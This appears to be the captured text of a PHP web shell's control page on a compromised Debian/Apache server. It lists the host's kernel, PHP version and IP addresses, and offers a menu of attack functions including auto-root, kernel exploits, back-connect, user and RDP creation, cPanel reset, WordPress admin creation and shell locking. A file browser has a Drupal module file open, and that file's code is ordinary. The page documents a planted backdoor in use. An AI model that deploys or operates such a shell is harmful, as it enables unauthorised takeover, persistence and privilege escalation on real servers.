Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 3.144.255.247
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
baltic /
web /
modules /
ctools /
stylizer /
[ HOME SHELL ]
Name
Size
Permission
Action
plugins
[ DIR ]
drwxr-xr-x
stylizer.info
345
B
-rw-r--r--
stylizer.install
1.8
KB
-rw-r--r--
stylizer.module
3.7
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : stylizer.install
<?php /** * Schema for stylizer. */ function stylizer_schema() { return stylizer_schema_1(); } function stylizer_schema_1() { $schema = array(); $schema['stylizer'] = array( 'description' => 'Customized stylizer styles created by administrative users.', 'export' => array( 'bulk export' => TRUE, 'export callback' => 'stylizer_style_export', 'can disable' => TRUE, 'identifier' => 'style', 'primary key' => 'sid', 'api' => array( 'owner' => 'stylizer', 'api' => 'stylizer', 'minimum_version' => 1, 'current_version' => 1, ), ), 'fields' => array( 'sid' => array( 'type' => 'serial', 'not null' => TRUE, 'no export' => TRUE, ), 'name' => array( 'type' => 'varchar', 'length' => '255', 'description' => 'Unique ID for this style. Used to identify it programmatically.', ), 'admin_title' => array( 'type' => 'varchar', 'length' => '255', 'description' => 'Human readable title for this style.', ), 'admin_description' => array( 'type' => 'text', 'size' => 'big', 'description' => 'Administrative description of this style.', 'object default' => '', ), 'settings' => array( 'type' => 'text', 'size' => 'big', 'serialize' => TRUE, 'object default' => array(), 'initial ' => array( 'name' => '_temporary', 'style_base' => NULL, 'palette' => array(), ), 'description' => 'A serialized array of settings specific to the style base that describes this plugin.', ), ), 'primary key' => array('sid'), 'unique keys' => array( 'name' => array('name'), ), ); return $schema; }
Close